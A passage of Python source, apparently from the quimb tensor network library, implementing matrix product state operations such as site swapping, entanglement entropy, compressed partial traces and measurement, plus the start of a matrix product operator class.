set_default_compress_mode(compress_opts, self.cyclic)
sTi, sTj = Tij.split(lix, get='tensors', **compress_opts)
# reindex and transpose the tensors to directly update original tensors
sTi.reindex_({ix_j: ix_i})
sTj.reindex_({ix_i: ix_j})
sTi.transpose_like_(Ti)
sTj.transpose_like_(Tj)
Ti.modify(data=sTi.data)
Tj.modify(data=sTj.data)
return mps
def swap_site_to(self, i, f, cur_orthog=None,
inplace=False, **compress_opts):
r"""Swap site ``i`` to site ``f``, compressing the bond after each
swap::
i f
0 1 2 3 4 5 6 7 8 9 0 1 2 4 5 6 7 3 8 9
o-o-o-x-o-o-o-o-o-o o-o-o-o-o-o-o-x-o-o
| | | | | | | | | | -> | | | | | | | | | |
Parameters
----------
i : int
The site to move.
f : int
The new location for site ``i``.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
inplace : bond, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
mps = self if inplace else self.copy()
if i == f:
return mps
if i < f:
js = range(i, f)
if f < i:
js = range(i - 1, f - 1, -1)
for j in js:
mps.swap_sites_with_compress(
j, j + 1, inplace=True, cur_orthog=cur_orthog, **compress_opts)
cur_orthog = (j, j + 1)
return mps
def gate_with_auto_swap(self, G, where, inplace=False,
cur_orthog=None, **compress_opts):
"""Perform a two site gate on this MPS by, if necessary, swapping and
compressing the sites until they are adjacent, using ``gate_split``,
then unswapping the sites back to their original position.
Parameters
----------
G : array
The gate, with shape ``(d**2, d**2)`` for physical dimension ``d``.
where : (int, int)
Indices of the sites to apply the gate to.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
inplace : bond, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
See Also
--------
gate, gate_split
"""
mps = self if inplace else self.copy()
i, j = sorted(where)
need2swap = i + 1 != j
# move j site adjacent to i site
if need2swap:
mps.swap_site_to(j, i + 1, cur_orthog=cur_orthog,
inplace=True, **compress_opts)
cur_orthog = (i + 1, i + 2)
# make sure sites are orthog center, then apply and split
mps.canonize((i, i + 1), cur_orthog)
mps.gate_split_(G, (i, i + 1), **compress_opts)
# move j site back to original position
if need2swap:
mps.swap_site_to(i + 1, j, cur_orthog=(i, i + 1),
inplace=True, **compress_opts, )
return mps
def magnetization(self, i, direction='Z', cur_orthog=None):
"""Compute the magnetization at site ``i``.
"""
if self.cyclic:
msg = ("``magnetization`` currently makes use of orthogonality for"
" efficiencies sake, for cyclic systems is it still "
"possible to compute as a normal expectation.")
raise NotImplementedError(msg)
self.canonize(i, cur_orthog)
# +-k-+
# | O |
# +-b-+
Tk = self[i]
ind1, ind2 = self.site_ind(i), '__tmp__'
Tb = Tk.H.reindex({ind1: ind2})
O_data = qu.spin_operator(direction, S=(self.phys_dim(i) - 1) / 2)
TO = Tensor(O_data, inds=(ind1, ind2))
return Tk.contract(TO, Tb)
def schmidt_values(self, i, cur_orthog=None, method='svd'):
r"""Find the schmidt values associated with the bipartition of this
MPS between sites on either site of ``i``. In other words, ``i`` is the
number of sites in the left hand partition::
....L.... i
o-o-o-o-o-S-o-o-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | |
i-1 ..........R..........
The schmidt values, ``S``, are the singular values associated with the
``(i - 1, i)`` bond, squared, provided the MPS is mixed canonized at
one of those sites.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
S : 1d-array
The schmidt values.
"""
if self.cyclic:
raise NotImplementedError
return self.singular_values(i, cur_orthog, method=method)**2
def entropy(self, i, cur_orthog=None, method='svd'):
"""The entropy of bipartition between the left block of ``i`` sites and
the rest.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
float
"""
if self.cyclic:
msg = ("For cyclic systems, try explicitly computing the entropy "
"of the (compressed) reduced density matrix.")
raise NotImplementedError(msg)
S = self.schmidt_values(i, cur_orthog=cur_orthog, method=method)
S = S[S > 0.0]
return do('sum', -S * do('log2', S))
def schmidt_gap(self, i, cur_orthog=None, method='svd'):
"""The schmidt gap of bipartition between the left block of ``i`` sites
and the rest.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
float
"""
if self.cyclic:
raise NotImplementedError
S = self.schmidt_values(i, cur_orthog=cur_orthog, method=method)
if len(S) == 1:
return S[0]
return S[0] - S[1]
def partial_trace(self, keep, upper_ind_id="b{}", rescale_sites=True):
r"""Partially trace this matrix product state, producing a matrix
product operator.
Parameters
----------
keep : sequence of int or slice
Indicies of the sites to keep.
upper_ind_id : str, optional
The ind id of the (new) 'upper' inds, i.e. the 'bra' inds.
rescale_sites : bool, optional
If ``True`` (the default), then the kept sites will be rescaled to
``(0, 1, 2, ...)`` etc. rather than keeping their original site
numbers.
Returns
-------
rho : MatrixProductOperator
The density operator in MPO form.
"""
p_bra = self.copy()
p_bra.reindex_sites_(upper_ind_id, where=keep)
rho = self.H & p_bra
# now have e.g:
# | | | |
# o-o-o-o-o-o-o-o-o
# | | | | |
# o-o-o-o-o-o-o-o-o
# | | | |
if isinstance(keep, slice):
keep = self.slice2sites(keep)
keep = sorted(keep)
for i in self.gen_site_coos():
if i in keep:
# |
# -o- |
# ... -o- ... -> ... -O- ...
# i| i|
rho ^= self.site_tag(i)
else:
# |
# -o-o- |
# ... | ... -> ... -OO- ...
# -o-o- |i+1
# i |i+1
if i < self.L - 1:
rho >>= [self.site_tag(i), self.site_tag(i + 1)]
else:
rho >>= [self.site_tag(i), self.site_tag(max(keep))]
rho.drop_tags(self.site_tag(i))
# if single site a single tensor is produced
if isinstance(rho, Tensor):
rho = TensorNetwork([rho])
if rescale_sites:
# e.g. [3, 4, 5, 7, 9] -> [0, 1, 2, 3, 4]
retag, reind = {}, {}
for new, old in enumerate(keep):
retag[self.site_tag(old)] = self.site_tag(new)
reind[self.site_ind(old)] = self.site_ind(new)
reind[upper_ind_id.format(old)] = upper_ind_id.format(new)
rho.retag_(retag)
rho.reindex_(reind)
L = len(keep)
else:
L = self.L
# transpose upper and lower tags to match other MPOs
rho.view_as_(
MatrixProductOperator,
cyclic=self.cyclic, L=L, site_tag_id=self.site_tag_id,
lower_ind_id=upper_ind_id, upper_ind_id=self.site_ind_id, )
rho.fuse_multibonds(inplace=True)
return rho
def ptr(self, keep, upper_ind_id="b{}", rescale_sites=True):
"""Alias of :meth:`~quimb.tensor.MatrixProductState.partial_trace`.
"""
return self.partial_trace(keep, upper_ind_id,
rescale_sites=rescale_sites)
def bipartite_schmidt_state(self, sz_a, get='ket', cur_orthog=None):
r"""Compute the reduced state for a bipartition of an OBC MPS, in terms
of the minimal left/right schmidt basis::
A B
......... ...........
>->->->->--s--<-<-<-<-<-< -> +-s-+
| | | | | | | | | | | | |
k0 k1... kA kB
Parameters
----------
sz_a : int
The number of sites in subsystem A, must be ``0 < sz_a < N``.
get : {'ket', 'rho', 'ket-dense', 'rho-dense'}, optional
Get the:
- 'ket': vector form as tensor.
- 'rho': density operator form, i.e. vector outer product
- 'ket-dense': like 'ket' but return ``qarray``.
- 'rho-dense': like 'rho' but return ``qarray``.
cur_orthog : int, optional
If given, take as the current orthogonality center so as to
efficienctly move it a minimal distance.
"""
if self.cyclic:
raise NotImplementedError("MPS must have OBC.")
s = do('diag', self.singular_values(sz_a, cur_orthog=cur_orthog))
if 'dense' in get:
kd = qu.qarray(s.reshape(-1, 1))
if 'ket' in get:
return kd
elif 'rho' in get:
return kd @ kd.H
else:
k = Tensor(s, (self.site_ind('A'), self.site_ind('B')))
if 'ket' in get:
return k
elif 'rho' in get:
return k & k.reindex({'kA': 'bA', 'kB': 'bB'})
@staticmethod
def _do_lateral_compress(mps, kb, section, leave_short, ul, ll, heps,
hmethod, hmax_bond, verbosity, compressed,
**compress_opts):
# section
# ul -o-o-o-o-o-o-o-o-o- ul -\ /-
# | | | | | | | | | ==> 0~~~~~0
# ll -o-o-o-o-o-o-o-o-o- ll -/ : \-
# hmax_bond
if leave_short:
# if section is short doesn't make sense to lateral compress
# work out roughly when this occurs by comparing bond size
left_sz = mps.bond_size(section[0] - 1, section[0])
right_sz = mps.bond_size(section[-1], section[-1] + 1)
if mps.phys_dim() ** len(section) <= left_sz * right_sz:
if verbosity >= 1:
print(f"Leaving lateral compress of section '{section}' as"
f" it is too short: length={len(section)}, eff "
f"size={left_sz * right_sz}.")
return
if verbosity >= 1:
print(f"Laterally compressing section {section}. Using options: "
f"eps={heps}, method={hmethod}, max_bond={hmax_bond}")
section_tags = map(mps.site_tag, section)
kb.replace_with_svd(section_tags, (ul, ll), heps, inplace=True,
ltags='_LEFT', rtags='_RIGHT', method=hmethod,
max_bond=hmax_bond, **compress_opts)
compressed.append(section)
@staticmethod
def _do_vertical_decomp(mps, kb, section, sysa, sysb, compressed, ul, ur,
ll, lr, vmethod, vmax_bond, veps, verbosity,
**compress_opts):
if section == sysa:
label = 'A'
elif section == sysb:
label = 'B'
else:
return
section_tags = [mps.site_tag(i) for i in section]
if section in compressed:
# ----U---- | <- vmax_bond
# -\ /- / ----U----
# L~~~~R ==> \ ==>
# -/ \- / ----D----
# ----D---- | <- vmax_bond
# try and choose a sensible method
if vmethod is None:
left_sz = mps.bond_size(section[0] - 1, section[0])
right_sz = mps.bond_size(section[-1], section[-1] + 1)
if left_sz * right_sz <= 2**13:
# cholesky is not rank revealing
vmethod = 'eigh' if vmax_bond else 'cholesky'
else:
vmethod = 'isvd'
if verbosity >= 1:
print(f"Performing vertical decomposition of section {label}, "
f"using options: eps={veps}, method={vmethod}, "
f"max_bond={vmax_bond}.")
# do vertical SVD
kb.replace_with_svd(
section_tags, (ul, ur), right_inds=(ll, lr), eps=veps,
ltags='_UP', rtags='_DOWN', method=vmethod, inplace=True,
max_bond=vmax_bond, **compress_opts)
# cut joined bond by reindexing to upper- and lower- ind_id.
kb.cut_between((mps.site_tag(section[0]), '_UP'),
(mps.site_tag(section[0]), '_DOWN'),
f"_tmp_ind_u{label}",
f"_tmp_ind_l{label}")
else:
# just unfold and fuse physical indices:
# |
# -A-A-A-A-A-A-A- -AAAAAAA-
# | | | | | | | ===>
# -A-A-A-A-A-A-A- -AAAAAAA-
# |
if verbosity >= 1:
print(f"Just vertical unfolding section {label}.")
kb, sec = kb.partition(section_tags, inplace=True)
sec_l, sec_u = sec.partition('_KET', inplace=True)
T_UP = (sec_u ^ all)
T_UP.add_tag('_UP')
T_UP.fuse_({f"_tmp_ind_u{label}":
[mps.site_ind(i) for i in section]})
T_DN = (sec_l ^ all)
T_DN.add_tag('_DOWN')
T_DN.fuse_({f"_tmp_ind_l{label}":
[mps.site_ind(i) for i in section]})
kb |= T_UP
kb |= T_DN
def partial_trace_compress(self, sysa, sysb, eps=1e-8,
method=('isvd', None), max_bond=(None, 1024),
leave_short=True, renorm=True,
lower_ind_id='b{}', verbosity=0,
**compress_opts):
r"""Perform a compressed partial trace using singular value
lateral then vertical decompositions of transfer matrix products::
.....sysa...... ...sysb....
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | | | | | | | | | | | | | | |
==> form inner product
............... ...........
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | | | | | | | | | | | | | | |
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
==> lateral SVD on each section
.....sysa...... ...sysb....
/\ /\ /\ /\
... ~~~E A~~~~~~~~~~~A E~E B~~~~~~~B E~~~ ...
\/ \/ \/ \/
==> vertical SVD and unfold on A & B
| |
/-------A-------\ /-----B-----\
... ~~~E E~E E~~~ ...
\-------A-------/ \-----B-----/
| |
With various special cases including OBC or end spins included in
subsytems.
Parameters
----------
sysa : sequence of int
The sites, which should be contiguous, defining subsystem A.
sysb : sequence of int
The sites, which should be contiguous, defining subsystem B.
eps : float or (float, float), optional
Tolerance(s) to use when compressing the subsystem transfer
matrices and vertically decomposing.
method : str or (str, str), optional
Method(s) to use for laterally compressing the state then
vertially compressing subsytems.
max_bond : int or (int, int), optional
The maximum bond to keep for laterally compressing the state then
vertially compressing subsytems.
leave_short : bool, optional
If True (the default), don't try to compress short sections.
renorm : bool, optional
If True (the default), renomalize the state so that ``tr(rho)==1``.
lower_ind_id : str, optional
The index id to create for the new density matrix, the upper_ind_id
is automatically taken as the current site_ind_id.
compress_opts : dict, optional
If given, supplied to ``partial_trace_compress`` to govern how
singular values are treated. See ``tensor_split``.
verbosity : {0, 1}, optional
How much information to print while performing the compressed
partial trace.
Returns
-------
rho_ab : TensorNetwork
Density matrix tensor network with
``outer_inds = ('k0', 'k1', 'b0', 'b1')`` for example.
"""
N = self.L
if (len(sysa) + len(sysb) == N) and not self.cyclic:
return self.bipartite_schmidt_state(len(sysa), get='rho')
# parse horizontal and vertical svd tolerances and methods
try:
heps, veps = eps
except (ValueError, TypeError):
heps = veps = eps
try:
hmethod, vmethod = method
except (ValueError, TypeError):
hmethod = vmethod = method
try:
hmax_bond, vmax_bond = max_bond
except (ValueError, TypeError):
hmax_bond = vmax_bond = max_bond
# the sequence of sites in each of the 'environment' sections
envm = range(max(sysa) + 1, min(sysb))
envl = range(0, min(sysa))
envr = range(max(sysb) + 1, N)
# spread norm, and if not cyclic put in mixed canonical form, taking
# care that the orthogonality centre is in right place to use identity
k = self.copy()
k.left_canonize()
k.right_canonize(max(sysa) + (bool(envm) or bool(envr)))
# form the inner product
b = k.conj()
k.add_tag('_KET')
b.add_tag('_BRA')
kb = k | b
# label the various partitions
names = ('_ENVL', '_SYSA', '_ENVM', '_SYSB', '_ENVR')
for name, where in zip(names, (envl, sysa, envm, sysb, envr)):
if where:
kb.add_tag(name, where=map(self.site_tag, where), which='any')
if self.cyclic:
# can combine right and left envs
sections = [envm, sysa, sysb, (*envr, *envl)]
else:
sections = [envm]
# if either system includes end, can ignore and use identity
if 0 not in sysa:
sections.append(sysa)
if N - 1 not in sysb:
sections.append(sysb)
# ignore empty sections
sections = list(filter(len, sections))
# figure out the various indices
ul_ur_ll_lrs = []
for section in sections:
# ...section[i]....
# ul[i] -o-o-o-o-o-o-o-o-o- ur[i]
# | | | | | | | | |
# ll[i] -o-o-o-o-o-o-o-o-o- lr[i]
st_left = self.site_tag(section[0] - 1)
st_right = self.site_tag(section[0])
ul, = bonds(kb['_KET', st_left], kb['_KET', st_right])
ll, = bonds(kb['_BRA', st_left], kb['_BRA', st_right])
st_left = self.site_tag(section[-1])
st_right = self.site_tag(section[-1] + 1)
ur, = bonds(kb['_KET', st_left], kb['_KET', st_right])
lr, = bonds(kb['_BRA', st_left], kb['_BRA', st_right])
ul_ur_ll_lrs.append((ul, ur, ll, lr))
# lateral compress sections if long
compressed = []
for section, (ul, _, ll, _) in zip(sections, ul_ur_ll_lrs):
self._do_lateral_compress(self, kb, section, leave_short, ul, ll,
heps, hmethod, hmax_bond, verbosity,
compressed, **compress_opts)
# vertical compress and unfold system sections only
for section, (ul, ur, ll, lr) in zip(sections, ul_ur_ll_lrs):
self._do_vertical_decomp(self, kb, section, sysa, sysb, compressed,
ul, ur, ll, lr, vmethod, vmax_bond, veps,
verbosity, **compress_opts)
if not self.cyclic:
# check if either system is at end, and thus reduces to identities
#
# A-A-A-A-A-A-A-m-m-m- \-m-m-m-
# | | | | | | | | | | ... ==> | | | ...
# A-A-A-A-A-A-A-m-m-m- /-m-m-m-
#
if 0 in sysa:
# get neighbouring tensor
if envm:
try:
TU = TD = kb['_ENVM', '_LEFT']
except KeyError:
# didn't lateral compress
TU = kb['_ENVM', '_KET', self.site_tag(envm[0])]
TD = kb['_ENVM', '_BRA', self.site_tag(envm[0])]
else:
TU = kb['_SYSB', '_UP']
TD = kb['_SYSB', '_DOWN']
ubnd, = kb['_KET', self.site_tag(sysa[-1])].bonds(TU)
lbnd, = kb['_BRA', self.site_tag(sysa[-1])].bonds(TD)
# delete the A system
kb.delete('_SYSA')
kb.reindex_({ubnd: "_tmp_ind_uA", lbnd: "_tmp_ind_lA"})
else:
# or else replace the left or right envs with identites since
#
# >->->->-A-A-A-A- +-A-A-A-A-
# | | | | | | | | ... ==> | | | | |
# >->->->-A-A-A-A- +-A-A-A-A-
#
kb.replace_with_identity('_ENVL', inplace=True)
if N - 1 in sysb:
# get neighbouring tensor
if envm:
try:
TU = TD = kb['_ENVM', '_RIGHT']
except KeyError:
# didn't lateral compress
TU = kb['_ENVM', '_KET', self.site_tag(envm[-1])]
TD = kb['_ENVM', '_BRA', self.site_tag(envm[-1])]
else:
TU = kb['_SYSA', '_UP']
TD = kb['_SYSA', '_DOWN']
ubnd, = kb['_KET', self.site_tag(sysb[0])].bonds(TU)
lbnd, = kb['_BRA', self.site_tag(sysb[0])].bonds(TD)
# delete the B system
kb.delete('_SYSB')
kb.reindex_({ubnd: "_tmp_ind_uB", lbnd: "_tmp_ind_lB"})
else:
kb.replace_with_identity('_ENVR', inplace=True)
kb.reindex_({
'_tmp_ind_uA': self.site_ind('A'),
'_tmp_ind_lA': lower_ind_id.format('A'),
'_tmp_ind_uB': self.site_ind('B'),
'_tmp_ind_lB': lower_ind_id.format('B'),
})
if renorm:
# normalize
norm = kb.trace(['kA', 'kB'], ['bA', 'bB'])
ts = []
tags = kb.tags
# check if we have system A
if '_SYSA' in tags:
ts.extend(kb[sysa[0]])
# check if we have system B
if '_SYSB' in tags:
ts.extend(kb[sysb[0]])
# If we dont' have either (OBC with both at ends) use middle envm
if len(ts) == 0:
ts.extend(kb[envm[0]])
nt = len(ts)
if verbosity > 0:
print(f"Renormalizing for norm {norm} among {nt} tensors.")
# now spread the norm out among tensors
for t in ts:
t.modify(data=t.data / norm**(1 / nt))
return kb
def logneg_subsys(self, sysa, sysb, compress_opts=None,
approx_spectral_opts=None, verbosity=0,
approx_thresh=2**12):
r"""Compute the logarithmic negativity between subsytem blocks, e.g.::
sysa sysb
......... .....
... -o-o-o-o-o-o-A-A-A-A-A-o-o-o-B-B-B-o-o-o-o-o-o-o- ...
| | | | | | | | | | | | | | | | | | | | | | | |
Parameters
----------
sysa : sequence of int
The sites, which should be contiguous, defining subsystem A.
sysb : sequence of int
The sites, which should be contiguous, defining subsystem B.
eps : float, optional
Tolerance to use when compressing the subsystem transfer matrices.
method : str or (str, str), optional
Method(s) to use for laterally compressing the state then
vertially compressing subsytems.
compress_opts : dict, optional
If given, supplied to ``partial_trace_compress`` to govern how
singular values are treated. See ``tensor_split``.
approx_spectral_opts
Supplied to :func:`~quimb.approx_spectral_function`.
Returns
-------
ln : float
The logarithmic negativity.
See Also
--------
MatrixProductState.partial_trace_compress, approx_spectral_function
"""
if not self.cyclic and (len(sysa) + len(sysb) == self.L):
# pure bipartition with OBC
psi = self.bipartite_schmidt_state(len(sysa), get='ket-dense')
d = round(psi.shape[0]**0.5)
return qu.logneg(psi, [d, d])
compress_opts = ensure_dict(compress_opts)
approx_spectral_opts = ensure_dict(approx_spectral_opts)
# set the default verbosity for each method
compress_opts.setdefault('verbosity', verbosity)
approx_spectral_opts.setdefault('verbosity', verbosity)
# form the compressed density matrix representation
rho_ab = self.partial_trace_compress(sysa, sysb, **compress_opts)
# view it as an operator
rho_ab_pt_lo = rho_ab.aslinearoperator(['kA', 'bB'], ['bA', 'kB'])
if rho_ab_pt_lo.shape[0] <= approx_thresh:
tr_norm = norm_trace_dense(rho_ab_pt_lo.to_dense(), isherm=True)
else:
# estimate its spectrum and sum the abs(eigenvalues)
tr_norm = qu.approx_spectral_function(
rho_ab_pt_lo, abs, **approx_spectral_opts)
# clip below 0
return max(0, log2(tr_norm))
def measure(
self,
site,
remove=False,
outcome=None,
renorm=True,
cur_orthog=None,
get=None,
inplace=False,
):
r"""Measure this MPS at ``site``, including projecting the state.
Optionally remove the site afterwards, yielding an MPS with one less
site. In either case the orthogonality center of the returned MPS is
``min(site, new_L - 1)``.
Parameters
----------
site : int
The site to measure.
remove : bool, optional
Whether to remove the site completely after projecting the
measurement. If ``True``, sites greater than ``site`` will be
retagged and reindex one down, and the MPS will have one less site.
E.g::
0-1-2-3-4-5-6
/ / / - measure and remove site 3
0-1-2-4-5-6
- reindex sites (4, 5, 6) to (3, 4, 5)
0-1-2-3-4-5
outcome : None or int, optional
Specify the desired outcome of the measurement. If ``None``, it
will be randomly sampled according to the local density matrix.
renorm : bool, optional
Whether to renormalize the state post measurement.
cur_orthog : None or int, optional
If you already know the orthogonality center, you can supply it
here for efficiencies sake.
get : {None, 'outcome'}, optional
If ``'outcome'``, simply return the outcome, and don't perform any
projection.
inplace : bool, optional
Whether to perform the measurement in place or not.
Returns
-------
outcome : int
The measurement outcome, drawn from ``range(phys_dim)``.
psi : MatrixProductState
The measured state, if ``get != 'outcome'``.
"""
if self.cyclic:
raise ValueError('Not supported on cyclic MPS yet.')
tn = self if inplace else self.copy()
L = tn.L
d = self.phys_dim(site)
# make sure MPS is canonicalized
if cur_orthog is not None:
tn.shift_orthogonality_center(cur_orthog, site)
else:
tn.canonize(site)
# local tensor and physical dim
t = tn[site]
ind = tn.site_ind(site)
# diagonal of reduced density matrix = probs
tii = t.contract(t.H, output_inds=(ind,))
p = do('real', tii.data)
if outcome is None:
# sample an outcome
outcome = do('random.choice', do('arange', d, like=p), p=p)
if get == 'outcome':
return outcome
# project the outcome and renormalize
t.isel_({ind: outcome})
if renorm:
t.modify(data=t.data / p[outcome]**0.5)
if remove:
# contract the projected tensor into neighbor
if site == L - 1:
tn ^= slice(site - 1, site + 1)
else:
tn ^= slice(site, site + 2)
# adjust structure for one less spin
for i in range(site + 1, L):
tn[i].reindex_({tn.site_ind(i): tn.site_ind(i - 1)})
tn[i].retag_({tn.site_tag(i): tn.site_tag(i - 1)})
tn._L = L - 1
else:
# simply re-expand tensor dimensions (with zeros)
t.new_ind(ind, size=d, axis=-1)
return outcome, tn
measure_ = functools.partialmethod(measure, inplace=True)
class MatrixProductOperator(TensorNetwork1DOperator,
TensorNetwork1DFlat,
TensorNetwork1D,
TensorNetwork):
"""Initialise a matrix product operator, with auto labelling and tagging.
Parameters
----------
arrays : sequence of arrays
The tensor arrays to form into a MPO.
shape : str, optional
String specifying layout of the tensors. E.g. 'lrud' (the default)
indicates the shape corresponds left-bond, right-bond, 'up' physical
index, 'down' physical index.
End tensors have either 'l' or 'r' dropped from the string.
upper_ind_id : str
A string specifiying how to label the upper physical site indices.
Should contain a ``'{}'`` placeholder. It is used to generate the
actual indices like: ``map(upper_ind_id.format, range(len(arrays)))``.
lower_ind_id : str
A string specifiying how to label the lower physical site indices.
Should contain a ``'{}'`` placeholder. It is used to generate the
actual indices like: ``map(lower_ind_id.format, range(len(arrays)))``.
site_tag_id : str
A string specifiying how to tag the tensors at each site. Should
contain a ``'{}'`` placeholder. It is used to generate the actual tags
like: ``map(site_tag_id.format, range(len(arrays)))``.
tags : str or sequence of str, optional
Global tags to attach to all tensors.
bond_name : str, optional
The base name of the bond indices, onto which uuids will be added.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_upper_ind_id',
'_lower_ind_id',
'cyclic',
'_L',
)
def __init__(self, arrays, shape='lrud', site_tag_id='I{}', tags=None,
upper_ind_id='k{}', lower_ind_id='b{}', bond_name="",
**tn_opts):
# short-circuit for copying
if isinstance(arrays, MatrixProductOperator):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays)
# process site indices
self._upper_ind_id = upper_ind_id
self._lower_ind_id = lower_ind_id
upper_inds = map(upper_ind_id.format, range(self.L))
lower_inds = map(lower_ind_id.format, range(self.L))
# process site tags
self._site_tag_id = site_tag_id
site_tags = map(site_tag_id.format, range(self.L))
if tags is not None:
if isinstance(tags, str):
tags = (tags,)
else:
tags = tuple(tags)
site_tags = tuple((st,) + tags for st in site_tags)
self.cyclic = (ops.ndim(arrays[0]) == 4)
# transpose arrays to 'lrud' order.
def gen_orders():
lud_ord = tuple(shape.replace('r', "").find(x) for x in 'lud')
rud_ord = tuple(shape.replace('l', "").find(x) for x in 'rud')
lrud_ord = tuple(map(shape.find, 'lrud'))
yield rud_ord if not self.cyclic else lrud_ord
for _ in range(self.L - 2):
yield lrud_ord
yield lud_ord if not self.cyclic else lrud_ord
def gen_inds():
cyc_bond = (rand_uuid(base=bond_name),) if self.cyclic else ()
nbond = rand_uuid(base=bond_name)
yield (*cyc_bond, nbond, next(upper_inds), next(lower_inds))
pbond = nbond
for _ in range(self.L - 2):
nbond = rand_uuid(base=bond_name)
yield (pbond, nbond, next(upper_inds), next(lower_inds))
pbond = nbond
yield (pbond, *cyc_bond, next(upper_inds), next(lower_inds))
def gen_tensors():
for array, site_tag, inds, order in zip(arrays, site_tags,
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=site_tag)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def from_dense(cls, ham, dims, upper_ind_id='k{}',
lower_ind_id='b{}', site_tag_id='I{}',
**split_opts):
"""Create a ``MatrixProductOperator`` directly from a dense vector
Parameters
----------
ham : array_like
The dense operator to convert to MPO from.
dims : sequence of int
Physical subsystem dimensions of each site.
upper_ind_id : str
How to index the upper sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
lower_ind_id : str
How to index the lower sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
site_tag_id : str
How to tag the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
split_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split` to
in order to partition the dense vector into tensors.
Returns
-------
MatrixProductOperator
"""
set_default_compress_mode(split_opts)
L = len(dims)
upper_inds = [upper_ind_id.format(i) for i in range(L)]
lower_inds = [lower_ind_id.format(i) for i in range(L)]
T = Tensor(reshape(ops.asarray(ham), dims+dims),
inds = upper_inds + lower_inds)
def gen_tensors():
# split
# <-- : yield
# : :
# OOOOOOO--O-O-O
# ||||||| | | |
# .......
# left_inds
TM = T
for i in range(L - 1, 0, -1):
TM, TR = TM.split(left_inds=upper_inds[:i]+lower_inds[:i], get='tensors',
rtags=site_tag_id.format(i), **split_opts)
yield TR
TM.add_tag(site_tag_id.format(0))
yield TM
tn = TensorNetwork(gen_tensors())
return cls.from_TN(tn, cyclic=False, L=L,
upper_ind_id=upper_ind_id,
lower_ind_id=lower_ind_id,
site_tag_id=site_tag_id)
def add_MPO(self, other, inplace=False, compress=False, **compress_opts):
"""Add another MatrixProductState to this one.
"""
if self.L != other.L:
raise ValueError("Can't add MPO with another of different length."
f"Got lengths {self.L} and {other.L}")
summed = self if inplace else self.copy()
for i in summed.gen_site_coos():
t1, t2 = summed[i], other[i]
if set(t1.inds) != set(t2.inds):
# Need to use bonds to match indices
reindex_map = {}
if i > 0 or self.cyclic:
pair = ((i - 1) % self.L, i)
reindex_map[other.bond(*pair)] = summed.bond(*pair)
if i < summed.L - 1 or self.cyclic:
pair = (i, (i + 1) % self.L)
reindex_map[other.bond(*pair)] = summed.bond(*pair)
t2 = t2.reindex(reindex_map)
sum_inds = (summed.upper_ind(i), summed.lower_ind(i))
t1.direct_product_(t2, sum_inds=sum_inds)
if compress:
summed.compress(**compress_opts)
return summed
add_MPO_ = functools.partialmethod(add_MPO, inplace=True)
_apply_mps = tensor_network_apply_op_vec
def _apply_mpo(self, other, compress=False, **compress_opts):
A, B = self.copy(), other.copy()
# align the indices and combine into a ladder
A.upper_ind_id = B.upper_ind_id
B.upper_ind_id = "__tmp{}__"
A.lower_ind_id = "__tmp{}__"
AB = A | B
# contract each pair of tensors at each site
for i in range(A.L):
AB ^= A.site_tag(i)
# convert back to MPO and fuse the double bonds
AB.view_as_(
MatrixProductOperator,
upper_ind_id=A.upper_ind_id,
lower_ind_id=B.lower_ind_id,
cyclic=self.cyclic,
)
AB.fuse_multibonds_()
# optionally compress
if compress:
AB.compress(**compress_opts)
return AB
def apply(self, other, compress=False, **compress_opts):
r"""Act with this MPO on another MPO or MPS, such that the resulting
object has the same tensor network structure/indices as ``other``.
For an MPS::
| | | | | | | | | | | | | | | | | |
self: A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A
| | | | | | | | | | | | | | | | | |
other: x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
-->
| | | | | | | | | | | | | | | | | | <- other.site_ind_id
out: y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y
For an MPO::
| | | | | | | | | | | | | | | | | |
self: A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A
| | | | | | | | | | | | | | | | | |
other: B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B
| | | | | | | | | | | | | | | | | |
-->
| | | | | | | | | | | | | | | | | | <- other.upper_ind_id
out: C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C
| | | | | | | | | | | | | | | | | | <- other.lower_ind_id
The resulting TN will have the same structure/indices as ``other``, but
probably with larger bonds (depending on compression).
Parameters
----------
other : MatrixProductOperator or MatrixProductState
The object to act on.
compress : bool, optional
Whether to compress the resulting object.
compress_opts
Supplied to :meth:`TensorNetwork1DFlat.compress`.
Returns
-------
MatrixProductOperator or MatrixProductState
"""
if isinstance(other, MatrixProductState):
return self._apply_mps(other, compress=compress, **compress_opts)
elif isinstance(other, MatrixProductOperator):
return self._apply_mpo(other, compress=compress, **compress_opts)
else:
raise TypeError("Can only Dot with a MatrixProductOperator or a "
f"MatrixProductState, got {type(other)}")
dot = apply
def permute_arrays(self, shape='lrud'):
